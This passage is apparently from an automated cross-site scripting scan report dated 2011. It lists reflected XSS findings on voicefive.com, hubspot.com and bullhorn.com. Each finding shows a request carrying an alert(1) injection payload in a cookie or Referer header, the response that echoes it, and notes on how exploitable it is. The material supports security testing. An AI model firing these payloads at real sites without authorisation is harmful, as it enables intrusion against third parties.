Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&c912d<script>alert(1)</script>bd186b7b654; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:11 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:11 2011&recExp=Mon Mar 7 01:34:11 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:11 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
Exp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&c912d<script>alert(1)</script>bd186b7b654' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

1.133. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84053757 cookie is copied into the HTML document as plain text between tags. The payload aaaa3<script>alert(1)</script>1725631997c was submitted in the ar_p84053757 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&aaaa3<script>alert(1)</script>1725631997c; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:13 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:13 2011&recExp=Mon Mar 7 01:34:13 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:13 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
44454&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&aaaa3<script>alert(1)</script>1725631997c', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p8
...[SNIP]...

1.134. http://bullhorn.app6.hubspot.com/salog.js.aspx [hubspotutk cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bullhorn.app6.hubspot.com
Path:   /salog.js.aspx

Issue detail

The value of the hubspotutk cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67955'-alert(1)-'d2c4667455a was submitted in the hubspotutk cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /salog.js.aspx HTTP/1.1
Host: bullhorn.app6.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.bullhorn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=mYIedAj8zAEkAAAANjA0ZDE2ZmItYWRmMi00NWQ0LTk2ZmEtMTZjNDMyYTFlYmM10; hubspotutk=14073622-df1e-48f8-8e94-7c149f3dc32367955'-alert(1)-'d2c4667455a; HUBSPOT39=588321964.0.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 08 Mar 2011 11:07:54 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 526


var hsUse20Servers = true;
var hsDayEndsIn = 64325;
var hsWeekEndsIn = 496325;
var hsMonthEndsIn = 2051525;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-03-08 06:07:54";
var hsIsNewVisitor = 0;
var hsFirstVisitValue = "";
var hsut = '14073622-df1e-48f8-8e94-7c149f3dc32367955'-alert(1)-'d2c4667455a';
var hsVisitLogOff = true;


document.write(unescape("%3Cscript src='" + document.location.protocol + "//" + hs_ppa + "/salog20.js?v=2.12' type='text/javascript'%3E%3C/script%3E"));

1.135. http://bullhorn.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bullhorn.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ed6e'%3balert(1)//c8f3424fcee was submitted in the Referer HTTP header. This input was echoed as 2ed6e';alert(1)//c8f3424fcee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: bullhorn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=2ed6e'%3balert(1)//c8f3424fcee

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Mar 2011 02:17:24 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.3
Location: http://www.bullhorn.com/
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript">
Set_Cookie('myleadsource', 'Search - SEO','');
Set_Cookie('myleadpromocode', 'Google','');
Set_Cookie('myleadkeyword', '2ed6e';alert(1)//c8f3424fcee','');
</script>
...[SNIP]...

1.136. http://bullhorn.com/newsrelease-details.php [Referer HTTP header]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bullhorn.com
Path:   /newsrelease-details.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9345'%3balert(1)//ea0a3ade1f5 was submitted in the Referer HTTP header. This input was echoed as d9345';alert(1)//ea0a3ade1f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /newsrelease-details.php HTTP/1.1
Host: bullhorn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d9345'%3balert(1)//ea0a3ade1f5

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Mar 2011 12:01:45 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=hb08jc54d56psadf8ai8mbphq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.bullhorn.com/newsrelease-details.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
Set_Cookie('myleadsource', 'Search - SEO','');
Set_Cookie('myleadpromocode', 'Google','');
Set_Cookie('myleadkeyword', 'd9345';alert(1)//ea0a3ade1f5','');
</script>
...[SNIP]...

Report generated by XSS.CX at Tue Mar 08 07:08:32 CST 2011.